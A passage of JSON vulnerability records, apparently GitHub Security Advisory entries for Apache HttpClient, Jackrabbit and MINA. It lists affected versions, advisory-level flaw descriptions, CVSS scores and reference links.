"https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-October/167962.html" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-October/167999.html" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-October/168030.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00032.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-11/msg00033.html" }, { "type": "WEB", "url": "http://svn.apache.org/viewvc?view=revision\u0026revision=1626784" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1033743" }, { "type": "WEB", "url": "http://www.ubuntu.com/usn/USN-2769-1" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:34:55Z", "nvd_published_at": "2015-10-27T16:59:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-gw85-4gmf-m7rh", "published": "2022-05-17T05:39:03Z", "modified": "2024-12-03T06:01:01.943495Z", "aliases": [ "CVE-2011-1498" ], "summary": "Exposure of Sensitive Information to an Unauthorized Actor in Apache HttpClient", "details": "Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive 
information by logging this header.", "affected": [ { "package": { "name": "org.apache.httpcomponents:httpclient", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.httpcomponents/httpclient" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.1.1" } ] } ], "versions": [ "4.0", "4.0.1", "4.0.2", "4.0.3", "4.1", "4.1-alpha1", "4.1-alpha2", "4.1-beta1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-gw85-4gmf-m7rh/GHSA-gw85-4gmf-m7rh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2011-1498" }, { "type": "WEB", "url": "https://github.com/apache/httpcomponents-client/commit/a572756592c969affd0ce87885724e74839176fb" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=709531" }, { "type": "PACKAGE", "url": "https://github.com/apache/httpcomponents-client" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/HTTPCLIENT-1061" }, { "type": "WEB", "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-June/061440.html" }, { "type": "WEB", "url": "http://marc.info/?l=httpclient-users\u0026m=129853896315461\u0026w=2" }, { "type": "WEB", "url": "http://marc.info/?l=httpclient-users\u0026m=129856318011586\u0026w=2" }, { "type": "WEB", "url": "http://marc.info/?l=httpclient-users\u0026m=129857589129183\u0026w=2" }, { "type": "WEB", "url": "http://marc.info/?l=httpclient-users\u0026m=129858274406594\u0026w=2" }, { "type": "WEB", "url": "http://marc.info/?l=httpclient-users\u0026m=129858299106950\u0026w=2" }, { "type": "WEB", "url": "http://openwall.com/lists/oss-security/2011/04/07/7" }, { "type": "WEB", "url": "http://openwall.com/lists/oss-security/2011/04/08/1" }, { "type": "WEB", "url": "http://securityreason.com/securityalert/8298" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2022-07-13T17:20:15Z", 
"nvd_published_at": "2011-07-07T21:55:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-pqwh-44jj-p5rm", "published": "2022-05-13T01:25:03Z", "modified": "2024-03-05T17:33:19.157465Z", "aliases": [ "CVE-2013-4366" ], "summary": "Hostname verification in Apache HttpClient 4.3 was disabled by default", "details": "http/impl/client/HttpClientBuilder.java in Apache HttpClient 4.3.x before 4.3.1 does not ensure that X509HostnameVerifier is not null, which allows attackers to have unspecified impact via vectors involving hostname verification.", "affected": [ { "package": { "name": "org.apache.httpcomponents:httpclient", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.httpcomponents/httpclient" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.3" }, { "fixed": "4.3.1" } ] } ], "versions": [ "4.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-pqwh-44jj-p5rm/GHSA-pqwh-44jj-p5rm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-4366" }, { "type": "WEB", "url": "https://github.com/apache/httpcomponents-client/commit/08140864e3e4c0994e094c4cf0507932baf6a66" }, { "type": "WEB", "url": "http://svn.apache.org/r1528614" }, { "type": "WEB", "url": "http://www.apache.org/dist/httpcomponents/httpclient/RELEASE_NOTES-4.3.x.txt" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-06-09T22:47:59Z", "nvd_published_at": "2017-10-30T19:29:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cxvc-g8f2-4gmm", "published": "2025-09-08T09:31:09Z", "modified": "2025-11-05T21:26:56.180617Z", "aliases": [ "CVE-2025-58782" ], "summary": "Apache Jackrabbit: Core and JCR Commons are vulnerable to Deserialization of Untrusted Data", "details": "There 
is a deserialization of Untrusted Data vulnerability in Apache Jackrabbit Core and Apache Jackrabbit JCR Commons.\n\nThis issue affects Apache Jackrabbit Core: from 1.0.0 through 2.22.1; Apache Jackrabbit JCR Commons: from 1.0.0 through 2.22.1.\n\nDeployments that accept JNDI URIs for JCR lookup from untrusted users allow them to inject malicious JNDI references, potentially leading to arbitrary code execution through deserialization of untrusted data. Users are recommended to upgrade to version 2.22.2. JCR lookup through JNDI has been disabled by default in 2.22.2. Users of this feature need to enable it explicitly and are advised to review their use of JNDI URI for JCR lookup.", "affected": [ { "package": { "name": "org.apache.jackrabbit:jackrabbit-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.jackrabbit/jackrabbit-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.0.0" }, { "fixed": "2.22.2" } ] } ], "versions": [ "1.0", "1.0.1", "1.1", "1.1.1", "1.2.1", "1.2.2", "1.2.3", "1.3", "1.3.1", "1.3.3", "1.4", "1.4.1", "1.4.10", "1.4.11", "1.4.12", "1.4.2", "1.4.3", "1.4.4", "1.4.5", "1.4.6", "1.4.7", "1.4.8", "1.4.9", "1.5.0", "1.5.2", "1.5.3", "1.5.4", "1.5.5", "1.5.6", "1.5.7", "1.6.0", "1.6.1", "1.6.2", "1.6.4", "1.6.5", "2.0-beta1", "2.0-beta3", "2.0-beta4", "2.0-beta5", "2.0-beta6", "2.0.0", "2.0.3", "2.0.5", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.5", "2.1.6", "2.10.0", "2.10.1", "2.10.2", "2.10.3", "2.10.4", "2.10.5", "2.10.6", "2.10.7", "2.10.8", "2.10.9", "2.11.0", "2.11.1", "2.11.2", "2.11.3", "2.12.0", "2.12.1", "2.12.10", "2.12.11", "2.12.2", "2.12.3", "2.12.4", "2.12.5", "2.12.6", "2.12.7", "2.12.8", "2.12.9", "2.13.0", "2.13.1", "2.13.2", "2.13.3", "2.13.4", "2.13.5", "2.13.6", "2.13.7", "2.14.0", "2.14.1", "2.14.10", "2.14.2", "2.14.3", "2.14.4", "2.14.5", "2.14.6", "2.14.7", "2.14.8", "2.14.9", "2.15.0", "2.15.1", "2.15.2", "2.15.3", "2.15.4", "2.15.5", "2.15.6", "2.15.7", "2.15.8", "2.16.0", "2.16.1", "2.16.10", 
"2.16.2", "2.16.3", "2.16.4", "2.16.5", "2.16.6", "2.16.7", "2.16.8", "2.16.9", "2.17.0", "2.17.1", "2.17.2", "2.17.3", "2.17.4", "2.17.5", "2.17.6", "2.17.7", "2.18.0", "2.18.1", "2.18.2", "2.18.3", "2.18.4", "2.18.5", "2.18.6", "2.19.0", "2.19.1", "2.19.2", "2.19.3", "2.19.4", "2.19.5", "2.19.6", "2.2.0", "2.2.1", "2.2.10", "2.2.11", "2.2.12", "2.2.13", "2.2.2", "2.2.4", "2.2.5", "2.2.7", "2.2.8", "2.2.9", "2.20.0", "2.20.1", "2.20.10", "2.20.11", "2.20.12", "2.20.13", "2.20.14", "2.20.15", "2.20.16", "2.20.17", "2.20.2", "2.20.3", "2.20.4", "2.20.5", "2.20.6", "2.20.7", "2.20.8", "2.20.9", "2.21.0", "2.21.1", "2.21.10", "2.21.11", "2.21.12", "2.21.13", "2.21.14", "2.21.15", "2.21.16", "2.21.17", "2.21.18", "2.21.19", "2.21.2", "2.21.20", "2.21.21", "2.21.22", "2.21.23", "2.21.24", "2.21.25", "2.21.26-beta", "2.21.27-beta", "2.21.3", "2.21.4", "2.21.5", "2.21.6", "2.21.7", "2.21.8", "2.21.9", "2.22.0", "2.22.1", "2.3.0", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.3.6", "2.3.7", "2.4.0", "2.4.1", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.6", "2.4.7", "2.4.8", "2.5.0", "2.5.1", "2.5.2", "2.5.3", "2.6.0", "2.6.1", "2.6.10", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.8", "2.6.9", "2.7.0", "2.7.1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.8.0", "2.8.1", "2.8.10", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.9", "2.9.0", "2.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-cxvc-g8f2-4gmm/GHSA-cxvc-g8f2-4gmm.json" } }, { "package": { "name": "org.apache.jackrabbit:jackrabbit-jcr-commons", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.jackrabbit/jackrabbit-jcr-commons" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.0.0" }, { "fixed": "2.22.2" } ] } ], "versions": [ "1.0", "1.0.1", "1.1", "1.1.1", "1.2.1", "1.2.2", "1.2.3", "1.3", "1.3.1", "1.3.3", "1.4", "1.4.2", "1.5.0", "1.5.2", "1.5.3", "1.5.5", "1.6.0", "1.6.1", "1.6.2", 
"1.6.4", "1.6.5", "2.0-beta1", "2.0-beta3", "2.0-beta4", "2.0-beta5", "2.0-beta6", "2.0.0", "2.0.3", "2.0.5", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.5", "2.1.6", "2.10.0", "2.10.1", "2.10.2", "2.10.3", "2.10.4", "2.10.5", "2.10.6", "2.10.7", "2.10.8", "2.10.9", "2.11.0", "2.11.1", "2.11.2", "2.11.3", "2.12.0", "2.12.1", "2.12.10", "2.12.11", "2.12.2", "2.12.3", "2.12.4", "2.12.5", "2.12.6", "2.12.7", "2.12.8", "2.12.9", "2.13.0", "2.13.1", "2.13.2", "2.13.3", "2.13.4", "2.13.5", "2.13.6", "2.13.7", "2.14.0", "2.14.1", "2.14.10", "2.14.2", "2.14.3", "2.14.4", "2.14.5", "2.14.6", "2.14.7", "2.14.8", "2.14.9", "2.15.0", "2.15.1", "2.15.2", "2.15.3", "2.15.4", "2.15.5", "2.15.6", "2.15.7", "2.15.8", "2.16.0", "2.16.1", "2.16.10", "2.16.2", "2.16.3", "2.16.4", "2.16.5", "2.16.6", "2.16.7", "2.16.8", "2.16.9", "2.17.0", "2.17.1", "2.17.2", "2.17.3", "2.17.4", "2.17.5", "2.17.6", "2.17.7", "2.18.0", "2.18.1", "2.18.2", "2.18.3", "2.18.4", "2.18.5", "2.18.6", "2.19.0", "2.19.1", "2.19.2", "2.19.3", "2.19.4", "2.19.5", "2.19.6", "2.2.0", "2.2.1", "2.2.10", "2.2.11", "2.2.12", "2.2.13", "2.2.2", "2.2.4", "2.2.5", "2.2.7", "2.2.8", "2.2.9", "2.20.0", "2.20.1", "2.20.10", "2.20.11", "2.20.12", "2.20.13", "2.20.14", "2.20.15", "2.20.16", "2.20.17", "2.20.2", "2.20.3", "2.20.4", "2.20.5", "2.20.6", "2.20.7", "2.20.8", "2.20.9", "2.21.0", "2.21.1", "2.21.10", "2.21.11", "2.21.12", "2.21.13", "2.21.14", "2.21.15", "2.21.16", "2.21.17", "2.21.18", "2.21.19", "2.21.2", "2.21.20", "2.21.21", "2.21.22", "2.21.23", "2.21.24", "2.21.25", "2.21.26-beta", "2.21.27-beta", "2.21.3", "2.21.4", "2.21.5", "2.21.6", "2.21.7", "2.21.8", "2.21.9", "2.22.0", "2.22.1", "2.3.0", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.3.6", "2.3.7", "2.4.0", "2.4.1", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.6", "2.4.7", "2.4.8", "2.5.0", "2.5.1", "2.5.2", "2.5.3", "2.6.0", "2.6.1", "2.6.10", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.7", "2.6.8", "2.6.9", "2.7.0", "2.7.1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.8.0", 
"2.8.1", "2.8.10", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.9", "2.9.0", "2.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-cxvc-g8f2-4gmm/GHSA-cxvc-g8f2-4gmm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58782" }, { "type": "WEB", "url": "https://github.com/apache/jackrabbit/pull/229" }, { "type": "PACKAGE", "url": "https://github.com/apache/jackrabbit" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/JCR-5135" }, { "type": "WEB", "url": "https://lists.apache.org/thread/t4wdrost6dh17dh406g792j9wq6xmy6v" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/09/06/3" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2025-09-09T15:14:38Z", "nvd_published_at": "2025-09-08T09:15:30Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9fc7-rhq3-wm7x", "published": "2022-05-17T03:48:02Z", "modified": "2024-02-16T08:06:20.906860Z", "aliases": [ "CVE-2016-6801" ], "summary": "Apache Jackrabbit Authentication Hijacking Vulnerability", "details": "Cross-site request forgery (CSRF) vulnerability in the CSRF content-type check in Jackrabbit-Webdav in Apache Jackrabbit 2.4.x before 2.4.6, 2.6.x before 2.6.6, 2.8.x before 2.8.3, 2.10.x before 2.10.4, 2.12.x before 2.12.4, and 2.13.x before 2.13.3 allows remote attackers to hijack the authentication of unspecified victims for requests that create a resource via an HTTP POST request with a (1) missing or (2) crafted Content-Type header.", "affected": [ { "package": { "name": "org.apache.jackrabbit:jackrabbit-webdav", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.jackrabbit/jackrabbit-webdav" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": 
"2.4.0" }, { "fixed": "2.4.6" } ] } ], "versions": [ "2.4.0", "2.4.1", "2.4.2", "2.4.3", "2.4.4", "2.4.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-9fc7-rhq3-wm7x/GHSA-9fc7-rhq3-wm7x.json" } }, { "package": { "name": "org.apache.jackrabbit:jackrabbit-webdav", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.jackrabbit/jackrabbit-webdav" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.6.0" }, { "fixed": "2.6.6" } ] } ], "versions": [ "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-9fc7-rhq3-wm7x/GHSA-9fc7-rhq3-wm7x.json" } }, { "package": { "name": "org.apache.jackrabbit:jackrabbit-webdav", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.jackrabbit/jackrabbit-webdav" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.3" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-9fc7-rhq3-wm7x/GHSA-9fc7-rhq3-wm7x.json" } }, { "package": { "name": "org.apache.jackrabbit:jackrabbit-webdav", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.jackrabbit/jackrabbit-webdav" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.10.0" }, { "fixed": "2.10.4" } ] } ], "versions": [ "2.10.0", "2.10.1", "2.10.2", "2.10.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-9fc7-rhq3-wm7x/GHSA-9fc7-rhq3-wm7x.json" } }, { "package": { "name": "org.apache.jackrabbit:jackrabbit-webdav", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.jackrabbit/jackrabbit-webdav" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.12.0" }, { "fixed": "2.12.4" } ] } ], 
"versions": [ "2.12.0", "2.12.1", "2.12.2", "2.12.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-9fc7-rhq3-wm7x/GHSA-9fc7-rhq3-wm7x.json" } }, { "package": { "name": "org.apache.jackrabbit:jackrabbit-webdav", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.jackrabbit/jackrabbit-webdav" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.13.0" }, { "fixed": "2.13.3" } ] } ], "versions": [ "2.13.0", "2.13.1", "2.13.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-9fc7-rhq3-wm7x/GHSA-9fc7-rhq3-wm7x.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-6801" }, { "type": "WEB", "url": "https://github.com/apache/jackrabbit/commit/16f2f02fcaef6202a2bf24c449d4fd10eb98f08d" }, { "type": "WEB", "url": "https://github.com/apache/jackrabbit/commit/ea75d7c2aeaafecd9ab97736bf81c5616f703244" }, { "type": "WEB", "url": "https://github.com/apache/jackrabbit/commit/eae001a54aae9c243ac06b5c8f711b2cb2038700" }, { "type": "PACKAGE", "url": "https://github.com/apache/jackrabbit" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/JCR-4009" }, { "type": "WEB", "url": "https://web.archive.org/web/20210123170657/http://www.securityfocus.com/bid/92966" }, { "type": "WEB", "url": "http://www.debian.org/security/2016/dsa-3679" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2016/09/14/6" } ], "database_specific": { "cwe_ids": [ "CWE-352" ], "github_reviewed": true, "github_reviewed_at": "2023-07-31T22:54:02Z", "nvd_published_at": "2016-09-21T14:25:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-5h29-qq92-wj7f", "published": "2022-05-24T16:57:28Z", "modified": "2023-11-08T04:00:32.405493Z", "aliases": [ 
"CVE-2019-0231" ], "summary": "Cleartext Transmission of Sensitive Information in Apache MINA", "details": "Handling of the close_notify SSL/TLS message does not lead to a connection closure, leading the server to retain the socket opened and to have the client potentially receive clear text messages afterward. Mitigation: 2.0.20 users should migrate to 2.0.21, 2.1.0 users should migrate to 2.1.1. This issue affects: Apache MINA.", "affected": [ { "package": { "name": "org.apache.mina:mina-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.mina/mina-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.0.21" } ] } ], "versions": [ "1.0.0", "1.0.1", "1.0.10", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "1.0.9", "1.1.0", "1.1.1", "1.1.2", "1.1.3", "1.1.4", "1.1.5", "1.1.6", "1.1.7", "2.0.0", "2.0.0-M1", "2.0.0-M2", "2.0.0-M3", "2.0.0-M4", "2.0.0-M5", "2.0.0-M6", "2.0.0-RC1", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.0.20", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-5h29-qq92-wj7f/GHSA-5h29-qq92-wj7f.json" } }, { "package": { "name": "org.apache.mina:mina-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.mina/mina-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.1.0" }, { "fixed": "2.1.1" } ] } ], "versions": [ "2.1.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-5h29-qq92-wj7f/GHSA-5h29-qq92-wj7f.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-0231" }, { "type": "WEB", "url": 
"http://mina.apache.org/mina-project/index.html#mina-211-mina-2021-released-posted-on-april-14-2019" } ], "database_specific": { "cwe_ids": [ "CWE-319" ], "github_reviewed": true, "github_reviewed_at": "2022-06-29T15:48:56Z", "nvd_published_at": "2019-10-01T20:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6mcm-j9cj-3vc3", "published": "2021-11-03T17:30:35Z", "modified": "2023-11-08T04:07:03.734341Z", "aliases": [ "CVE-2021-41973" ], "summary": "Infinite loop in Apache MINA", "details": "In Apache MINA, a specifically crafted, malformed HTTP request may cause the HTTP Header decoder to loop indefinitely. The decoder assumed that the HTTP Header begins at the beginning of the buffer and loops if there is more data than expected. Please update MINA to 2.1.5 or greater.", "affected": [ { "package": { "name": "org.apache.mina:mina-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.mina/mina-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.1.0" }, { "fixed": "2.1.5" } ] } ], "versions": [ "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/11/GHSA-6mcm-j9cj-3vc3/GHSA-6mcm-j9cj-3vc3.json" } }, { "package": { "name": "org.apache.mina:mina-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.mina/mina-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.0.22" } ] } ], "versions": [ "1.0.0", "1.0.1", "1.0.10", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "1.0.9", "1.1.0", "1.1.1", "1.1.2", "1.1.3", "1.1.4", "1.1.5", "1.1.6", "1.1.7", "2.0.0", "2.0.0-M1", "2.0.0-M2", "2.0.0-M3", "2.0.0-M4", "2.0.0-M5", "2.0.0-M6", "2.0.0-RC1", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", 
"2.0.20", "2.0.21", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/11/GHSA-6mcm-j9cj-3vc3/GHSA-6mcm-j9cj-3vc3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-41973" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0b907da9340d5ff4e6c1a4798ef4e79700a668657f27cca8a39e9250%40%3Cdev.mina.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/11/01/2" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/11/01/8" } ], "database_specific": { "cwe_ids": [ "CWE-835" ], "github_reviewed": true, "github_reviewed_at": "2021-11-02T19:48:48Z", "nvd_published_at": "2021-11-01T09:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-76h9-2vwh-w278", "published": "2024-12-25T12:30:45Z", "modified": "2025-02-12T18:32:35.851404Z", "aliases": [ "CVE-2024-52046" ], "related": [ "CGA-69xr-35vw-ch6p" ], "summary": "Apache MINA Deserialization RCE Vulnerability", "details": "The `ObjectSerializationDecoder` in Apache MINA uses Java’s native deserialization protocol to process incoming serialized data but lacks the necessary security checks and defenses. 
This vulnerability allows attackers to exploit the deserialization process by sending specially crafted malicious serialized data, potentially leading to remote code execution (RCE) attacks.\n\t\nThis issue affects MINA core versions 2.0.X, 2.1.X and 2.2.X, and will be fixed by the releases 2.0.27, 2.1.10 and 2.2.4.\n\nIt's also important to note that an application using MINA core library will only be affected if the IoBuffer#getObject() method is called, and this specific method is potentially called when adding a ProtocolCodecFilter instance using the `ObjectSerializationCodecFactory` class in the filter chain. If your application is specifically using those classes, you have to upgrade to the latest version of MINA core library.\n\nUpgrading will  not be enough: you also need to explicitly allow the classes the decoder will accept in the ObjectSerializationDecoder instance, using one of the three new methods:\n\n1. \n     * Accept class names where the supplied ClassNameMatcher matches for deserialization, unless they are otherwise rejected.\n * `@param classNameMatcher` the matcher to use\n * / `public void accept(ClassNameMatcher classNameMatcher)`\n\n2. \n * Accept class names that match the supplied pattern for deserialization, unless they are otherwise rejected.\n * `@param` pattern standard Java regexp\n * / `public void accept(Pattern pattern)`\n\n3.\n * Accept the wildcard specified classes for deserialization, unless they are otherwise rejected.\n * `@param` patterns Wildcard file name patterns as defined by `{@link org.apache.commons.io.FilenameUtils#wildcardMatch(String, String) FilenameUtils.wildcardMatch}`\n * / `public void accept(String... 
patterns)`\n\nBy default, the decoder will reject *all* classes that will be present in the incoming data.\n\nNote: The FtpServer, SSHd and Vysper sub-project are not affected by this issue.", "affected": [ { "package": { "name": "org.apache.mina:mina-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.mina/mina-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.2.0" }, { "fixed": "2.2.4" } ] } ], "versions": [ "2.2.0", "2.2.1", "2.2.2", "2.2.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-76h9-2vwh-w278/GHSA-76h9-2vwh-w278.json" } }, { "package": { "name": "org.apache.mina:mina-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.mina/mina-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.1.0" }, { "fixed": "2.1.10" } ] } ], "versions": [ "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.1.6", "2.1.7", "2.1.8", "2.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-76h9-2vwh-w278/GHSA-76h9-2vwh-w278.json" } }, { "package": { "name": "org.apache.mina:mina-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.mina/mina-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0-M1" }, { "fixed": "2.0.27" } ] } ], "versions": [ "2.0.0", "2.0.0-M1", "2.0.0-M2", "2.0.0-M3", "2.0.0-M4", "2.0.0-M5", "2.0.0-M6", "2.0.0-RC1", "2.0.1", "2.0.10", "2.0.11", "2.0.12", "2.0.13", "2.0.14", "2.0.15", "2.0.16", "2.0.17", "2.0.18", "2.0.19", "2.0.2", "2.0.20", "2.0.21", "2.0.22", "2.0.23", "2.0.24", "2.0.25", "2.0.26", "2.0.3", "2.0.4", "2.0.5", "2.0.6", "2.0.7", "2.0.8", "2.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/12/GHSA-76h9-2vwh-w278/GHSA-76h9-2vwh-w278.json" } } ], "references": [ { "type": "ADVISORY", "url": 
